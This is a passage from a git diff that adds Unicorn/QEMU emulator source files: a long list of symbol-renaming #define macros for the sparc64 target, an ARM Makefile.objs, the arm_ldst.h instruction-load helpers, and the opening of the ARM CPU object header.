tb_jmp_cache_hash_func_sparc64 +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_sparc64 +#define tb_jmp_remove tb_jmp_remove_sparc64 +#define tb_link_page tb_link_page_sparc64 +#define tb_page_remove tb_page_remove_sparc64 +#define tb_phys_hash_func tb_phys_hash_func_sparc64 +#define tb_phys_invalidate tb_phys_invalidate_sparc64 +#define tb_reset_jump tb_reset_jump_sparc64 +#define tb_set_jmp_target tb_set_jmp_target_sparc64 +#define tcg_accel_class_init tcg_accel_class_init_sparc64 +#define tcg_accel_type tcg_accel_type_sparc64 +#define tcg_add_param_i32 tcg_add_param_i32_sparc64 +#define tcg_add_param_i64 tcg_add_param_i64_sparc64 +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_sparc64 +#define tcg_allowed tcg_allowed_sparc64 +#define tcg_canonicalize_memop tcg_canonicalize_memop_sparc64 +#define tcg_commit tcg_commit_sparc64 +#define tcg_cond_to_jcc tcg_cond_to_jcc_sparc64 +#define tcg_constant_folding tcg_constant_folding_sparc64 +#define 
tcg_const_i32 tcg_const_i32_sparc64 +#define tcg_const_i64 tcg_const_i64_sparc64 +#define tcg_const_local_i32 tcg_const_local_i32_sparc64 +#define tcg_const_local_i64 tcg_const_local_i64_sparc64 +#define tcg_context_init tcg_context_init_sparc64 +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_sparc64 +#define tcg_cpu_exec tcg_cpu_exec_sparc64 +#define tcg_current_code_size tcg_current_code_size_sparc64 +#define tcg_dump_info tcg_dump_info_sparc64 +#define tcg_dump_ops tcg_dump_ops_sparc64 +#define tcg_exec_all tcg_exec_all_sparc64 +#define tcg_find_helper tcg_find_helper_sparc64 +#define tcg_func_start tcg_func_start_sparc64 +#define tcg_gen_abs_i32 tcg_gen_abs_i32_sparc64 +#define tcg_gen_add2_i32 tcg_gen_add2_i32_sparc64 +#define tcg_gen_add_i32 tcg_gen_add_i32_sparc64 +#define tcg_gen_add_i64 tcg_gen_add_i64_sparc64 +#define tcg_gen_addi_i32 tcg_gen_addi_i32_sparc64 +#define tcg_gen_addi_i64 tcg_gen_addi_i64_sparc64 +#define tcg_gen_andc_i32 tcg_gen_andc_i32_sparc64 +#define tcg_gen_and_i32 tcg_gen_and_i32_sparc64 +#define tcg_gen_and_i64 tcg_gen_and_i64_sparc64 +#define tcg_gen_andi_i32 tcg_gen_andi_i32_sparc64 +#define tcg_gen_andi_i64 tcg_gen_andi_i64_sparc64 +#define tcg_gen_br tcg_gen_br_sparc64 +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_sparc64 +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_sparc64 +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_sparc64 +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_sparc64 +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_sparc64 +#define tcg_gen_callN tcg_gen_callN_sparc64 +#define tcg_gen_code tcg_gen_code_sparc64 +#define tcg_gen_code_common tcg_gen_code_common_sparc64 +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_sparc64 +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_sparc64 +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_sparc64 +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_sparc64 +#define tcg_gen_exit_tb tcg_gen_exit_tb_sparc64 +#define tcg_gen_ext16s_i32 
tcg_gen_ext16s_i32_sparc64 +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_sparc64 +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_sparc64 +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_sparc64 +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_sparc64 +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_sparc64 +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_sparc64 +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_sparc64 +#define tcg_gen_goto_tb tcg_gen_goto_tb_sparc64 +#define tcg_gen_ld_i32 tcg_gen_ld_i32_sparc64 +#define tcg_gen_ld_i64 tcg_gen_ld_i64_sparc64 +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_sparc64 +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_sparc64 +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_sparc64 +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_sparc64 +#define tcg_gen_mov_i32 tcg_gen_mov_i32_sparc64 +#define tcg_gen_mov_i64 tcg_gen_mov_i64_sparc64 +#define tcg_gen_movi_i32 tcg_gen_movi_i32_sparc64 +#define tcg_gen_movi_i64 tcg_gen_movi_i64_sparc64 +#define tcg_gen_mul_i32 tcg_gen_mul_i32_sparc64 +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_sparc64 +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_sparc64 +#define tcg_gen_neg_i32 tcg_gen_neg_i32_sparc64 +#define tcg_gen_neg_i64 tcg_gen_neg_i64_sparc64 +#define tcg_gen_not_i32 tcg_gen_not_i32_sparc64 +#define tcg_gen_op0 tcg_gen_op0_sparc64 +#define tcg_gen_op1i tcg_gen_op1i_sparc64 +#define tcg_gen_op2_i32 tcg_gen_op2_i32_sparc64 +#define tcg_gen_op2_i64 tcg_gen_op2_i64_sparc64 +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_sparc64 +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_sparc64 +#define tcg_gen_op3_i32 tcg_gen_op3_i32_sparc64 +#define tcg_gen_op3_i64 tcg_gen_op3_i64_sparc64 +#define tcg_gen_op4_i32 tcg_gen_op4_i32_sparc64 +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_sparc64 +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_sparc64 +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_sparc64 +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_sparc64 +#define tcg_gen_op6_i32 tcg_gen_op6_i32_sparc64 +#define 
tcg_gen_op6i_i32 tcg_gen_op6i_i32_sparc64 +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_sparc64 +#define tcg_gen_orc_i32 tcg_gen_orc_i32_sparc64 +#define tcg_gen_or_i32 tcg_gen_or_i32_sparc64 +#define tcg_gen_or_i64 tcg_gen_or_i64_sparc64 +#define tcg_gen_ori_i32 tcg_gen_ori_i32_sparc64 +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_sparc64 +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_sparc64 +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_sparc64 +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_sparc64 +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_sparc64 +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_sparc64 +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_sparc64 +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_sparc64 +#define tcg_gen_sar_i32 tcg_gen_sar_i32_sparc64 +#define tcg_gen_sari_i32 tcg_gen_sari_i32_sparc64 +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_sparc64 +#define tcg_gen_shl_i32 tcg_gen_shl_i32_sparc64 +#define tcg_gen_shl_i64 tcg_gen_shl_i64_sparc64 +#define tcg_gen_shli_i32 tcg_gen_shli_i32_sparc64 +#define tcg_gen_shli_i64 tcg_gen_shli_i64_sparc64 +#define tcg_gen_shr_i32 tcg_gen_shr_i32_sparc64 +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_sparc64 +#define tcg_gen_shr_i64 tcg_gen_shr_i64_sparc64 +#define tcg_gen_shri_i32 tcg_gen_shri_i32_sparc64 +#define tcg_gen_shri_i64 tcg_gen_shri_i64_sparc64 +#define tcg_gen_st_i32 tcg_gen_st_i32_sparc64 +#define tcg_gen_st_i64 tcg_gen_st_i64_sparc64 +#define tcg_gen_sub_i32 tcg_gen_sub_i32_sparc64 +#define tcg_gen_sub_i64 tcg_gen_sub_i64_sparc64 +#define tcg_gen_subi_i32 tcg_gen_subi_i32_sparc64 +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_sparc64 +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_sparc64 +#define tcg_gen_xor_i32 tcg_gen_xor_i32_sparc64 +#define tcg_gen_xor_i64 tcg_gen_xor_i64_sparc64 +#define tcg_gen_xori_i32 tcg_gen_xori_i32_sparc64 +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_sparc64 +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_sparc64 +#define tcg_get_arg_str_idx 
tcg_get_arg_str_idx_sparc64 +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_sparc64 +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_sparc64 +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_sparc64 +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_sparc64 +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_sparc64 +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_sparc64 +#define tcg_handle_interrupt tcg_handle_interrupt_sparc64 +#define tcg_init tcg_init_sparc64 +#define tcg_invert_cond tcg_invert_cond_sparc64 +#define tcg_la_bb_end tcg_la_bb_end_sparc64 +#define tcg_la_br_end tcg_la_br_end_sparc64 +#define tcg_la_func_end tcg_la_func_end_sparc64 +#define tcg_liveness_analysis tcg_liveness_analysis_sparc64 +#define tcg_malloc tcg_malloc_sparc64 +#define tcg_malloc_internal tcg_malloc_internal_sparc64 +#define tcg_op_defs_org tcg_op_defs_org_sparc64 +#define tcg_opt_gen_mov tcg_opt_gen_mov_sparc64 +#define tcg_opt_gen_movi tcg_opt_gen_movi_sparc64 +#define tcg_optimize tcg_optimize_sparc64 +#define tcg_out16 tcg_out16_sparc64 +#define tcg_out32 tcg_out32_sparc64 +#define tcg_out64 tcg_out64_sparc64 +#define tcg_out8 tcg_out8_sparc64 +#define tcg_out_addi tcg_out_addi_sparc64 +#define tcg_out_branch tcg_out_branch_sparc64 +#define tcg_out_brcond32 tcg_out_brcond32_sparc64 +#define tcg_out_brcond64 tcg_out_brcond64_sparc64 +#define tcg_out_bswap32 tcg_out_bswap32_sparc64 +#define tcg_out_bswap64 tcg_out_bswap64_sparc64 +#define tcg_out_call tcg_out_call_sparc64 +#define tcg_out_cmp tcg_out_cmp_sparc64 +#define tcg_out_ext16s tcg_out_ext16s_sparc64 +#define tcg_out_ext16u tcg_out_ext16u_sparc64 +#define tcg_out_ext32s tcg_out_ext32s_sparc64 +#define tcg_out_ext32u tcg_out_ext32u_sparc64 +#define tcg_out_ext8s tcg_out_ext8s_sparc64 +#define tcg_out_ext8u tcg_out_ext8u_sparc64 +#define tcg_out_jmp tcg_out_jmp_sparc64 +#define tcg_out_jxx tcg_out_jxx_sparc64 +#define tcg_out_label tcg_out_label_sparc64 +#define 
tcg_out_ld tcg_out_ld_sparc64 +#define tcg_out_modrm tcg_out_modrm_sparc64 +#define tcg_out_modrm_offset tcg_out_modrm_offset_sparc64 +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_sparc64 +#define tcg_out_mov tcg_out_mov_sparc64 +#define tcg_out_movcond32 tcg_out_movcond32_sparc64 +#define tcg_out_movcond64 tcg_out_movcond64_sparc64 +#define tcg_out_movi tcg_out_movi_sparc64 +#define tcg_out_op tcg_out_op_sparc64 +#define tcg_out_pop tcg_out_pop_sparc64 +#define tcg_out_push tcg_out_push_sparc64 +#define tcg_out_qemu_ld tcg_out_qemu_ld_sparc64 +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_sparc64 +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_sparc64 +#define tcg_out_qemu_st tcg_out_qemu_st_sparc64 +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_sparc64 +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_sparc64 +#define tcg_out_reloc tcg_out_reloc_sparc64 +#define tcg_out_rolw_8 tcg_out_rolw_8_sparc64 +#define tcg_out_setcond32 tcg_out_setcond32_sparc64 +#define tcg_out_setcond64 tcg_out_setcond64_sparc64 +#define tcg_out_shifti tcg_out_shifti_sparc64 +#define tcg_out_st tcg_out_st_sparc64 +#define tcg_out_tb_finalize tcg_out_tb_finalize_sparc64 +#define tcg_out_tb_init tcg_out_tb_init_sparc64 +#define tcg_out_tlb_load tcg_out_tlb_load_sparc64 +#define tcg_out_vex_modrm tcg_out_vex_modrm_sparc64 +#define tcg_patch32 tcg_patch32_sparc64 +#define tcg_patch8 tcg_patch8_sparc64 +#define tcg_pcrel_diff tcg_pcrel_diff_sparc64 +#define tcg_pool_reset tcg_pool_reset_sparc64 +#define tcg_prologue_init tcg_prologue_init_sparc64 +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_sparc64 +#define tcg_reg_alloc tcg_reg_alloc_sparc64 +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_sparc64 +#define tcg_reg_alloc_call tcg_reg_alloc_call_sparc64 +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_sparc64 +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_sparc64 +#define tcg_reg_alloc_op tcg_reg_alloc_op_sparc64 +#define tcg_reg_alloc_start 
tcg_reg_alloc_start_sparc64 +#define tcg_reg_free tcg_reg_free_sparc64 +#define tcg_reg_sync tcg_reg_sync_sparc64 +#define tcg_set_frame tcg_set_frame_sparc64 +#define tcg_set_nop tcg_set_nop_sparc64 +#define tcg_swap_cond tcg_swap_cond_sparc64 +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_sparc64 +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_sparc64 +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_sparc64 +#define tcg_target_const_match tcg_target_const_match_sparc64 +#define tcg_target_init tcg_target_init_sparc64 +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_sparc64 +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_sparc64 +#define tcg_temp_alloc tcg_temp_alloc_sparc64 +#define tcg_temp_free_i32 tcg_temp_free_i32_sparc64 +#define tcg_temp_free_i64 tcg_temp_free_i64_sparc64 +#define tcg_temp_free_internal tcg_temp_free_internal_sparc64 +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_sparc64 +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_sparc64 +#define tcg_temp_new_i32 tcg_temp_new_i32_sparc64 +#define tcg_temp_new_i64 tcg_temp_new_i64_sparc64 +#define tcg_temp_new_internal tcg_temp_new_internal_sparc64 +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_sparc64 +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_sparc64 +#define tdb_hash tdb_hash_sparc64 +#define teecr_write teecr_write_sparc64 +#define teehbr_access teehbr_access_sparc64 +#define temp_allocate_frame temp_allocate_frame_sparc64 +#define temp_dead temp_dead_sparc64 +#define temps_are_copies temps_are_copies_sparc64 +#define temp_save temp_save_sparc64 +#define temp_sync temp_sync_sparc64 +#define tgen_arithi tgen_arithi_sparc64 +#define tgen_arithr tgen_arithr_sparc64 +#define thumb2_logic_op thumb2_logic_op_sparc64 +#define ti925t_initfn ti925t_initfn_sparc64 +#define tlb_add_large_page tlb_add_large_page_sparc64 +#define tlb_flush_entry tlb_flush_entry_sparc64 +#define 
tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_sparc64 +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_sparc64 +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_sparc64 +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_sparc64 +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_sparc64 +#define tlbi_aa64_va_write tlbi_aa64_va_write_sparc64 +#define tlbiall_is_write tlbiall_is_write_sparc64 +#define tlbiall_write tlbiall_write_sparc64 +#define tlbiasid_is_write tlbiasid_is_write_sparc64 +#define tlbiasid_write tlbiasid_write_sparc64 +#define tlbimvaa_is_write tlbimvaa_is_write_sparc64 +#define tlbimvaa_write tlbimvaa_write_sparc64 +#define tlbimva_is_write tlbimva_is_write_sparc64 +#define tlbimva_write tlbimva_write_sparc64 +#define tlb_is_dirty_ram tlb_is_dirty_ram_sparc64 +#define tlb_protect_code tlb_protect_code_sparc64 +#define tlb_reset_dirty_range tlb_reset_dirty_range_sparc64 +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_sparc64 +#define tlb_set_dirty tlb_set_dirty_sparc64 +#define tlb_set_dirty1 tlb_set_dirty1_sparc64 +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_sparc64 +#define tlb_vaddr_to_host tlb_vaddr_to_host_sparc64 +#define token_get_type token_get_type_sparc64 +#define token_get_value token_get_value_sparc64 +#define token_is_escape token_is_escape_sparc64 +#define token_is_keyword token_is_keyword_sparc64 +#define token_is_operator token_is_operator_sparc64 +#define tokens_append_from_iter tokens_append_from_iter_sparc64 +#define to_qiv to_qiv_sparc64 +#define to_qov to_qov_sparc64 +#define tosa_init tosa_init_sparc64 +#define tosa_machine_init tosa_machine_init_sparc64 +#define tswap32 tswap32_sparc64 +#define tswap64 tswap64_sparc64 +#define type_class_get_size type_class_get_size_sparc64 +#define type_get_by_name type_get_by_name_sparc64 +#define type_get_parent type_get_parent_sparc64 +#define type_has_parent type_has_parent_sparc64 +#define type_initialize type_initialize_sparc64 +#define 
type_initialize_interface type_initialize_interface_sparc64 +#define type_is_ancestor type_is_ancestor_sparc64 +#define type_new type_new_sparc64 +#define type_object_get_size type_object_get_size_sparc64 +#define type_register_internal type_register_internal_sparc64 +#define type_table_add type_table_add_sparc64 +#define type_table_get type_table_get_sparc64 +#define type_table_lookup type_table_lookup_sparc64 +#define uint16_to_float32 uint16_to_float32_sparc64 +#define uint16_to_float64 uint16_to_float64_sparc64 +#define uint32_to_float32 uint32_to_float32_sparc64 +#define uint32_to_float64 uint32_to_float64_sparc64 +#define uint64_to_float128 uint64_to_float128_sparc64 +#define uint64_to_float32 uint64_to_float32_sparc64 +#define uint64_to_float64 uint64_to_float64_sparc64 +#define unassigned_io_ops unassigned_io_ops_sparc64 +#define unassigned_io_read unassigned_io_read_sparc64 +#define unassigned_io_write unassigned_io_write_sparc64 +#define unassigned_mem_accepts unassigned_mem_accepts_sparc64 +#define unassigned_mem_ops unassigned_mem_ops_sparc64 +#define unassigned_mem_read unassigned_mem_read_sparc64 +#define unassigned_mem_write unassigned_mem_write_sparc64 +#define update_spsel update_spsel_sparc64 +#define v6_cp_reginfo v6_cp_reginfo_sparc64 +#define v6k_cp_reginfo v6k_cp_reginfo_sparc64 +#define v7_cp_reginfo v7_cp_reginfo_sparc64 +#define v7mp_cp_reginfo v7mp_cp_reginfo_sparc64 +#define v7m_pop v7m_pop_sparc64 +#define v7m_push v7m_push_sparc64 +#define v8_cp_reginfo v8_cp_reginfo_sparc64 +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_sparc64 +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_sparc64 +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_sparc64 +#define vapa_cp_reginfo vapa_cp_reginfo_sparc64 +#define vbar_write vbar_write_sparc64 +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_sparc64 +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_sparc64 +#define vfp_get_fpcr vfp_get_fpcr_sparc64 +#define vfp_get_fpscr 
vfp_get_fpscr_sparc64 +#define vfp_get_fpsr vfp_get_fpsr_sparc64 +#define vfp_reg_offset vfp_reg_offset_sparc64 +#define vfp_set_fpcr vfp_set_fpcr_sparc64 +#define vfp_set_fpscr vfp_set_fpscr_sparc64 +#define vfp_set_fpsr vfp_set_fpsr_sparc64 +#define visit_end_implicit_struct visit_end_implicit_struct_sparc64 +#define visit_end_list visit_end_list_sparc64 +#define visit_end_struct visit_end_struct_sparc64 +#define visit_end_union visit_end_union_sparc64 +#define visit_get_next_type visit_get_next_type_sparc64 +#define visit_next_list visit_next_list_sparc64 +#define visit_optional visit_optional_sparc64 +#define visit_start_implicit_struct visit_start_implicit_struct_sparc64 +#define visit_start_list visit_start_list_sparc64 +#define visit_start_struct visit_start_struct_sparc64 +#define visit_start_union visit_start_union_sparc64 +#define vmsa_cp_reginfo vmsa_cp_reginfo_sparc64 +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_sparc64 +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_sparc64 +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_sparc64 +#define vmsa_ttbcr_write vmsa_ttbcr_write_sparc64 +#define vmsa_ttbr_write vmsa_ttbr_write_sparc64 +#define write_cpustate_to_list write_cpustate_to_list_sparc64 +#define write_list_to_cpustate write_list_to_cpustate_sparc64 +#define write_raw_cp_reg write_raw_cp_reg_sparc64 +#define X86CPURegister32_lookup X86CPURegister32_lookup_sparc64 +#define x86_op_defs x86_op_defs_sparc64 +#define xpsr_read xpsr_read_sparc64 +#define xpsr_write xpsr_write_sparc64 +#define xscale_cpar_write xscale_cpar_write_sparc64 +#define xscale_cp_reginfo xscale_cp_reginfo_sparc64 +#define cpu_sparc_exec cpu_sparc_exec_sparc64 +#define helper_compute_psr helper_compute_psr_sparc64 +#define helper_compute_C_icc helper_compute_C_icc_sparc64 +#define cpu_sparc_init cpu_sparc_init_sparc64 +#define cpu_sparc_set_id cpu_sparc_set_id_sparc64 +#define sparc_cpu_register_types sparc_cpu_register_types_sparc64 +#define helper_fadds helper_fadds_sparc64 
+#define helper_faddd helper_faddd_sparc64 +#define helper_faddq helper_faddq_sparc64 +#define helper_fsubs helper_fsubs_sparc64 +#define helper_fsubd helper_fsubd_sparc64 +#define helper_fsubq helper_fsubq_sparc64 +#define helper_fmuls helper_fmuls_sparc64 +#define helper_fmuld helper_fmuld_sparc64 +#define helper_fmulq helper_fmulq_sparc64 +#define helper_fdivs helper_fdivs_sparc64 +#define helper_fdivd helper_fdivd_sparc64 +#define helper_fdivq helper_fdivq_sparc64 +#define helper_fsmuld helper_fsmuld_sparc64 +#define helper_fdmulq helper_fdmulq_sparc64 +#define helper_fnegs helper_fnegs_sparc64 +#define helper_fitos helper_fitos_sparc64 +#define helper_fitod helper_fitod_sparc64 +#define helper_fitoq helper_fitoq_sparc64 +#define helper_fdtos helper_fdtos_sparc64 +#define helper_fstod helper_fstod_sparc64 +#define helper_fqtos helper_fqtos_sparc64 +#define helper_fstoq helper_fstoq_sparc64 +#define helper_fqtod helper_fqtod_sparc64 +#define helper_fdtoq helper_fdtoq_sparc64 +#define helper_fstoi helper_fstoi_sparc64 +#define helper_fdtoi helper_fdtoi_sparc64 +#define helper_fqtoi helper_fqtoi_sparc64 +#define helper_fabss helper_fabss_sparc64 +#define helper_fsqrts helper_fsqrts_sparc64 +#define helper_fsqrtd helper_fsqrtd_sparc64 +#define helper_fsqrtq helper_fsqrtq_sparc64 +#define helper_fcmps helper_fcmps_sparc64 +#define helper_fcmpd helper_fcmpd_sparc64 +#define helper_fcmpes helper_fcmpes_sparc64 +#define helper_fcmped helper_fcmped_sparc64 +#define helper_fcmpq helper_fcmpq_sparc64 +#define helper_fcmpeq helper_fcmpeq_sparc64 +#define helper_ldfsr helper_ldfsr_sparc64 +#define helper_debug helper_debug_sparc64 +#define helper_udiv_cc helper_udiv_cc_sparc64 +#define helper_sdiv_cc helper_sdiv_cc_sparc64 +#define helper_taddcctv helper_taddcctv_sparc64 +#define helper_tsubcctv helper_tsubcctv_sparc64 +#define sparc_cpu_do_interrupt sparc_cpu_do_interrupt_sparc64 +#define helper_check_align helper_check_align_sparc64 +#define helper_ld_asi 
helper_ld_asi_sparc64 +#define helper_st_asi helper_st_asi_sparc64 +#define helper_cas_asi helper_cas_asi_sparc64 +#define helper_ldqf helper_ldqf_sparc64 +#define helper_stqf helper_stqf_sparc64 +#define sparc_cpu_unassigned_access sparc_cpu_unassigned_access_sparc64 +#define sparc_cpu_do_unaligned_access sparc_cpu_do_unaligned_access_sparc64 +#define sparc_cpu_handle_mmu_fault sparc_cpu_handle_mmu_fault_sparc64 +#define dump_mmu dump_mmu_sparc64 +#define sparc_cpu_get_phys_page_debug sparc_cpu_get_phys_page_debug_sparc64 +#define sparc_reg_reset sparc_reg_reset_sparc64 +#define sparc_reg_read sparc_reg_read_sparc64 +#define sparc_reg_write sparc_reg_write_sparc64 +#define gen_intermediate_code_init gen_intermediate_code_init_sparc64 +#define cpu_set_cwp cpu_set_cwp_sparc64 +#define cpu_get_psr cpu_get_psr_sparc64 +#define cpu_put_psr cpu_put_psr_sparc64 +#define cpu_cwp_inc cpu_cwp_inc_sparc64 +#define cpu_cwp_dec cpu_cwp_dec_sparc64 +#define helper_save helper_save_sparc64 +#define helper_restore helper_restore_sparc64 +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/Makefile.objs new file mode 100644 index 0000000..483d620 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/Makefile.objs @@ -0,0 +1,6 @@ +obj-y += translate.o op_helper.o helper.o cpu.o +obj-y += neon_helper.o iwmmxt_helper.o +obj-$(CONFIG_SOFTMMU) += psci.o +obj-$(TARGET_AARCH64) += cpu64.o translate-a64.o helper-a64.o unicorn_aarch64.o +obj-$(TARGET_ARM) += unicorn_arm.o +obj-y += crypto_helper.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/arm_ldst.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/arm_ldst.h new file mode 100644 index 0000000..b1ece01 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/arm_ldst.h @@ -0,0 +1,48 @@ +/* + * ARM load/store instructions for code (armeb-user support) + * + * Copyright (c) 2012 
CodeSourcery, LLC + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#ifndef ARM_LDST_H +#define ARM_LDST_H + +#include "exec/cpu_ldst.h" +#include "qemu/bswap.h" + +/* Load an instruction and return it in the standard little-endian order */ +static inline uint32_t arm_ldl_code(CPUARMState *env, target_ulong addr, + bool do_swap) +{ + uint32_t insn = cpu_ldl_code(env, addr); + if (do_swap) { + return bswap32(insn); + } + return insn; +} + +/* Ditto, for a halfword (Thumb) instruction */ +static inline uint16_t arm_lduw_code(CPUARMState *env, target_ulong addr, + bool do_swap) +{ + uint16_t insn = cpu_lduw_code(env, addr); + if (do_swap) { + return bswap16(insn); + } + return insn; +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu-qom.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu-qom.h new file mode 100644 index 0000000..fad08eb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu-qom.h @@ -0,0 +1,219 @@ +/* + * QEMU ARM CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. 
+ * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see + * + */ +#ifndef QEMU_ARM_CPU_QOM_H +#define QEMU_ARM_CPU_QOM_H + +#include "qom/cpu.h" + +#define TYPE_ARM_CPU "arm-cpu" + +#define ARM_CPU_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, ARMCPUClass, (klass), TYPE_ARM_CPU) +#define ARM_CPU(uc, obj) ((ARMCPU *)obj) +#define ARM_CPU_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, ARMCPUClass, (obj), TYPE_ARM_CPU) + +/** + * ARMCPUClass: + * @parent_realize: The parent class' realize handler. + * @parent_reset: The parent class' reset handler. + * + * An ARM CPU model. + */ +typedef struct ARMCPUClass { + /*< private >*/ + CPUClass parent_class; + /*< public >*/ + + DeviceRealize parent_realize; + void (*parent_reset)(CPUState *cpu); +} ARMCPUClass; + +/** + * ARMCPU: + * @env: #CPUARMState + * + * An ARM CPU core. + */ +typedef struct ARMCPU { + /*< private >*/ + CPUState parent_obj; + /*< public >*/ + + CPUARMState env; + + /* Coprocessor information */ + GHashTable *cp_regs; + /* For marshalling (mostly coprocessor) register state between the + * kernel and QEMU (for KVM) and between two QEMUs (for migration), + * we use these arrays. + */ + /* List of register indexes managed via these arrays; (full KVM style + * 64 bit indexes, not CPRegInfo 32 bit indexes) + */ + uint64_t *cpreg_indexes; + /* Values of the registers (cpreg_indexes[i]'s value is cpreg_values[i]) */ + uint64_t *cpreg_values; + /* Length of the indexes, values, reset_values arrays */ + int32_t cpreg_array_len; + /* These are used only for migration: incoming data arrives in + * these fields and is sanity checked in post_load before copying + * to the working data structures 